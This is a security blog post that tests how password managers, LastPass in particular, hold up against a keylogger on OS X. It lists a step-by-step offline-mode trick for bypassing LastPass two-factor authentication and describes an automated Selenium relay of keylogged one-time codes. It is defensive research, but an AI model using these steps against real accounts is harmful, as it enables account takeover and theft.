Password managers – convenient for you or for an attacker? LastPass two-factor authentication bypass

In *, 2FA, Cloud, Confidentiality, Data at rest, Encryption, Hacking, Penetration Testing, Research, Vulnerabilities by [email protected]

I have been wondering about password managers for a while and have been too paranoid to use them. The reason being that with a password manager all of your passwords are stored in one place. Once false move (Click the wrong link or open the wrong attachment) and you have an attackers keylogger running on your system. Now instead of having to compromise each account separately the attacker just has to get the password to your password manager and now they have everything all conveniently accessible.
Why is this bad? Because for example if I only log into my PayPal account once every 6 months an attacker would have to wait listening to a keylogger for 6 months to get my PayPal password. For that matter the attacker would not even know I had a PayPal account. With a password management solution they know what accounts you have and are given immediate access to all of them. This allows an attacker to compromise all of your accounts simultaneously; meaning they can try to transfer money out of your PayPal, checking account, savings account, 401k, bitcoin, you name it account’s all compromised at once.
Many security pros would say that is an easy problem to solve. Just use two-factor authentication to access the password manager. Problem solved right? See part 2 for the answer.
I have run all tests using the latest version of OS X 10.10 Yosemite, the latest version of the Safari browser (wait I thought Macs were not hackable…), and the keyloggerlogKext2.3.
Part 1. Without two-factor authentication
Test case #1 – Enter password from actual keyboard
Result:
Full username and password captured
Test case #2 – Enter password from on screen keyboard
Result:
Nothing captured with keylogger although there may be other attack vectors.
Part 2. With two-factor authentication
Test case #3 – Enter password and OTP from two-factor token (Google Auth)
Result:
Full username and password captured
Six digit OTP captured
Test case #4 – Enter password and OTP from two-factor token (Yubikey)
Result:
Full username and password captured
The static password stored in slot 1 captured
The OTP stored in slot 2 captured
Test case #5 – Disable connection to Internet with two-factor authentication enabled.
Assuming that an attacker gets the LastPass credential of a user who has two-factor enabled they may be able to do this to bypass two-factor.
Step 1. Log out of LastPass
Step 2. Open a website login page
Step 3. Disable Internet
Step 4. Log into LastPass
NOTE: Since there is no connection to Internet I was not even prompted for OTP. LastPass is in offline mode.
 
Step 5: Go to LastPass vault to select a login page
Step 6: Enable Internet
Step 7: As soon as Internet comes up click to login (about 5-10 second window)
Step 8: Login is successful (if not just turn off internet, log into LastPass and try again)
Notice that there is a warning icon where LastPass extension is and the login page gave me a warning but I was still able to bypass the two-factor requirement and log into the site.
Conclusions: Password management solutions are convenient for users. Unfortunately under some conditions they can even be more convenient for attackers. My conclusion is that the most secure way to use a password management solution is if you use the on screen keyboard for password entry. The keylogger was not able to obtain this password (although keep in mind that just because I could not do this does not mean it is not possible there may be an attack that would be able to do this). Two-factor authentication helps but as shown with LastPass there may be ways to bypass the two-factor authentication. Also if the OTP token is captured in real time an attacker’s automation script would be able to capture the OTP from the keylogger and use it before the user clicks submit. This could be automated with something like selenium. The selenium script essentially just greps the log of keystrokes, whatever comes after the LastPass password and enters it into browser login page on attackers system. The user would just see that their login failed and try again.

Source: New feed